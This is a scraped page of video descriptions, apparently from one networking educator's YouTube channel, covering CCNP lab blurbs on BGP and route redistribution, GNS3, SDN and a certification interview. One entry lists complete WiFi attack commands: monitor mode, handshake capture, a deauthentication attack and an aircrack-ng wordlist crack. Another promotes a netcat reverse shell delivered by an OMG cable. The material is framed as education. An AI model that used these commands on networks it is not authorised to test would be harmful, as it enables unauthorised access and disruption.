GNS3 Portable Project File: https://bit.ly/2wOGalc
This is one of multiple Cisco CCNP GNS3 Labs. Are you ready to pass your CCNP exam?
For lots more content, visit http://www.davidbombal.com - learn about GNS3, CCNA, Packet Tracer, Python, Ansible and much, much more.
300-101 ROUTE Exam information: https://bit.ly/2GkcFXQ
300-115 SWITCH Exam information: https://bit.ly/2KrSWIe
300-135 TSHOOT Exam information: https://bit.ly/2IlHpgY
Training: http://www.davidbombal.com
Border Gateway Protocol (BGP) is a standardized exterior gateway protocol designed to exchange routing and reachability information among autonomous systems (AS) on the Internet.[1] The protocol is classified as a path vector protocol.[2] The Border Gateway Protocol makes routing decisions based on paths, network policies, or rule-sets configured by a network administrator and is involved in making core routing decisions.
BGP may be used for routing within an autonomous system. In this application it is referred to as Interior Border Gateway Protocol, Internal BGP, or iBGP. In contrast, the Internet application of the protocol may be referred to as Exterior Border Gateway Protocol, External BGP, or eBGP.
BGP neighbors, called peers, are established by manual configuration between routers to create a TCP session on port 179. A BGP speaker sends 19-byte keep-alive messages every 60 seconds[5] to maintain the connection.[6] Among routing protocols, BGP is unique in using TCP as its transport protocol.
When BGP runs between two peers in the same autonomous system (AS), it is referred to as Internal BGP (iBGP or Interior Border Gateway Protocol). When it runs between different autonomous systems, it is called External BGP (eBGP or Exterior Border Gateway Protocol). Routers on the boundary of one AS exchanging information with another AS are called border or edge routers or simply eBGP peers and are typically connected directly, while iBGP peers can be interconnected through other intermediate routers. Other deployment topologies are also possible, such as running eBGP peering inside a VPN tunnel, allowing two remote sites to exchange routing information in a secure and isolated manner. The main difference between iBGP and eBGP peering is in the way routes that were received from one peer are propagated to other peers. For instance, new routes learned from an eBGP peer are typically redistributed to all iBGP peers as well as all other eBGP peers (if transit mode is enabled on the router). However, if new routes are learned on an iBGP peering, then they are re-advertised only to all eBGP peers. These route-propagation rules effectively require that all iBGP peers inside an AS are interconnected in a full mesh.
How routes are propagated can be controlled in detail via the route-maps me
...
https://www.youtube.com/watch?v=eu9iUE9gf2Y
This is part of my series "Building insane (large scale) GNS3 networks". I plan to continue adding more and more devices to the topology until..... well.... until I am done.
I continue building the GNS3 the topology by configuring a router on a stick, creating multiple DHCP pools - thus making the Cisco router a DHCP server. I also configure NAT (well actually PAT) on the Cisco router and test network connectivity.
...
https://www.youtube.com/watch?v=4tYD4BIdSc8
Create your own virtual machine on Linode with $100 credit:
https://davidbombal.wiki/linode
* Thanks to Linode for sponsoring this video!
// MENU //
0:00 ▶️ Introduction
1:05 ▶️ Network Topology
3:40 ▶️ Method 1: Easy Method
5:09 ▶️ OMG Cable
8:00 ▶️ Method 2
// STEPS and INSTRUCTIONS //
Download this PDF for detailed instructions: https://davidbombal.wiki/netcatomg
// SOCIAL //
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
// MY STUFF //
Monitor: https://amzn.to/3yyF74Y
More stuff: https://www.amazon.com/shop/davidbombal
// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com
hak5
netcat
rat
hak5 omg
omg cable
hak5 reverse shell
rubber ducky
windows
windows 11
windows 10
real time protection
windows anti virus
windows real time protection
Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration. No actual attack took place on any websites.
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
#hak5 #netcat #reverseshell
...
https://www.youtube.com/watch?v=KhwJ6fD-t10
Learn about SDN and OpenFlow with my GNS3 course: https://goo.gl/lGyz9J - Over 10 hours of content! The HPE Network Protector SDN Application leverages an SDN controller and OpenFlow to intercept DNS queries. All DNS queries are checked against a list of malicious domains to ensure that users are not connecting to "bad" websites.
...
https://www.youtube.com/watch?v=8XnBsVGJLKM
Be like Stefan! No excuses! Get certified and change your life.
Big thank you to Juniper Networks for supporting the community and making this training free (and sponsoring my channel). Go to https://juniper.net/davidbombal to get lots of training and also learn how to get certified for $50 (Associate Level). Use this voucher code to register for your courses: DAVIDBOMBAL
// FREE training //
Lots of free courses: https://juniper.net/davidbombal
// Juniper links mentioned //
Coures: https://juniper.net/davidbombal
Community: https://community.juniper.net/home
// Stefan’s SOCIAL //
LinkedIn: https://www.linkedin.com/in/sfouant
X / Twitter: https://www.twitter.com/sfouant
Website: Shortestpathfirst https://www.shortestpathfirst.net/
Youtube: https://www.youtube.com/c/ShortestPathFirst
// David's SOCIAL //
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook: https://www.facebook.com/davidbombal.co
TikTok: http://tiktok.com/@davidbombal
YouTube: https://www.youtube.com/davidbombal
// MY STUFF //
https://www.amazon.com/shop/davidbombal
// MENU //
00:00 - Coming up
01:07 - Intro
01:21 - JNCIE
02:20 - Back Story
15:45 - Experience
16:49 - ShortestPathFirst
19:10 - Free Juniper Training
23:16 - Labs
26:00 - Time management
28:34 - Story Time
29:45 - Put in the work
35:44 - Certificates
37:30 - Keep learning
40:35 - AI in networking
44:42 - Where to start
47:50 - Networking vs. cybersecurity
50:21 - Certs vs. Degree
54:17 - Motivation
55:58 - Mist Ai
01:00:32 - Outro
cyber
cybersecurity
ai
artificial intelligence
juniper
wifi
juniper mist
networking
network
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
Disclaimer: This video is for educational purposes only. I own all equipment used for this demonstration.
#cybersecurity #ai #cloud
...
https://www.youtube.com/watch?v=775JuquJBlM
In this video I demonstrate how to use regular expressions with Python network automation. Learn how to use regular expression with BGP, Cisco IOS and Python.
Get $200 worth of network software for free here: https://goo.gl/613TUF
...
https://www.youtube.com/watch?v=jSYPHA02OY0
This is one of multiple videos discussing topics such as SDN, REST APIs, SDx, Overlays, Network Programmability, Network Automation and lots more.
My full CCNA course is here: http://www.ccnax.com
Get $200 worth of network software for free here: https://goo.gl/613TUF
Subscribe to learn how to pass the CCNA 200-125 exam. Also includes content for the ICND1 100-105 and ICND2 200-105 exams.
What do you want to learn? Let me know via the comments.
...
https://www.youtube.com/watch?v=2PkiHDRQZCU
GNS3 Portable Project File: https://bit.ly/2LznpFx
This is one of multiple Cisco CCNP GNS3 Labs. Are you ready to pass your CCNP exam?
If you configure two-way redistribution at multiple points in your network, you can introduce routing loops. One way to stop the redistribution of already redistributed routes is to use route tags. In two-way multipoint redistribution labs, route tags should be applied and filtered in both direction and on al routers performing redistribution.
For lots more content, visit http://www.davidbombal.com - learn about GNS3, CCNA, Packet Tracer, Python, Ansible and much, much more.
300-101 ROUTE Exam information: https://bit.ly/2GkcFXQ
300-115 SWITCH Exam information: https://bit.ly/2KrSWIe
300-135 TSHOOT Exam information: https://bit.ly/2IlHpgY
Training: http://www.davidbombal.com
The use of a routing protocol to advertise routes that are learned by some other means, such as by another routing protocol, static routes, or directly connected routes, is called redistribution. While running a single routing protocol throughout your entire IP internetwork is desirable, multi-protocol routing is common for a number of reasons, such as company mergers, multiple departments managed by multiple network administrators, and multi-vendor environments. Running different routing protocols is often part of a network design. In any case, having a multiple protocol environment makes redistribution a necessity.
Differences in routing protocol characteristics, such as metrics, administrative distance, classful and classless capabilities can effect redistribution. Consideration must be given to these differences for redistribution to succeed
When you redistribute one protocol into another, remember that the metrics of each protocol play an important role in redistribution. Each protocol uses different metrics. For example, the Routing Information Protocol (RIP) metric is based on hop count, but Interior Gateway Routing Protocol (IGRP) and Enhanced Interior Gateway Routing Protocol (EIGRP) use a composite metric based on bandwidth, delay, reliability, load, and maximum transmission unit (MTU), where bandwidth and delay are the only parameters used by default. When routes are redistributed, you must define a metric that is understandable to the receiving protocol. There are two methods to define metrics when redistributing routes.
If a router is running more than one routing protocol and learns a route to the same destination using both routing protocols, then which route should be selected as the best route? Each protocol uses its own metric type to determine the best route. Comparing routes with different metric types cannot be done. Administrative distances take care of this problem. Administrative distances are assigned to route sou
...
https://www.youtube.com/watch?v=8dJc9FXXapk
Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video.
Menu:
Use airmon-ng to crack WiFi networks: 0:00
Network Adapter to use: 0:46
Kali Linux setup: 1:20
Plug in network adapter: 1:35
Verify that network adapter is recognized by Kali Linux: 2:04
WPA2 network to crack: 2:43
iwconfig: 3:27
Kali Version: 3:34
Kill conflicting processes with airmon-ng: 3:55
Put interface into monitor mode: 4:32
Discover WiFi Networks with airodump-ng: 5:15
Use airodump-ng to view only one network: 6:20
Connect to network using an iPhone: 6:39
airodump-ng capture WPA2 four way handshake: 6:58
Use aireplay-ng to deauthenticate clients: 7:25
WPA2 four way handshake captured: 8:08
Use Wireshark to view WPA2 four way handshake: 8:38
Put interface back into managed mode: 9:30
Crack WPA2 password with aircrack-ng: 10:10
Password cracked: 11:00
WiFi router WPA2 settings: 12:00
Summary: 12:40
================
Network Adapters:
================
Alfa AWUS036NHA: https://amzn.to/3qbQGKN
Alfa AWUSO36NH: https://amzn.to/3moeQiI
================
Commands used:
================
! See version of Kali
cat /etc/os-release
uname -a
! See interfaces
ip addr
iwconfig
!kill processes
sudo airmon-ng check kill
!Start monitor mode
sudo airmon-ng start wlan0
!Verify that monitor mode is used
sudo airmon-ng
!You could also use iwconfig to check that interface is in monitor mode:
iwconfig
! Get the AP's MAC address and channel
sudo airodump-ng wlan0mon
! AP-MAC & channel - you need to select your own here:
ESSID: 90:9A:4A:B8:F3:FB
Channel used by AP for SSID: 2
!1st Window:
!Make sure you replace the channel number and bssid with your own
!Replace hack1 with your file name like capture1 or something
sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon
!2nd Window - deauth attack
!Make sure you replace the bssid with your own
sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon
!Use Wireshark to open hack file
wireshark hack1-01.cap
!Filter Wireshark messages for EAPOL
eapol
!Stop monitor mode
airmon-ng stop wlan0mon
!Crack file with Rock you or another wordlist
!Make sure you have rockyou in text format (unzip file on Kali)
!Replace hack1-01.cap with your file name
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
================
Previous videos:
================
Kali Installation: https://youtu.be/VAMP8DqSDjg
WPA2 GPU password cracking: https://youtu.be/J8A8rKFZW-M
Wordlists (rockyou): https://youtu.be/rgWcguAg-XA
================
Connect with me:
================
Discord: https://discord.com/invite/usKSyzb
Twitter: https://www.twitter.com/davidbombal
Instagram: https://www.instagram.com/davidbombal
LinkedIn: https://www.linkedin.com/in/davidbombal
Facebook
...
https://www.youtube.com/watch?v=WfYxrLaqlN8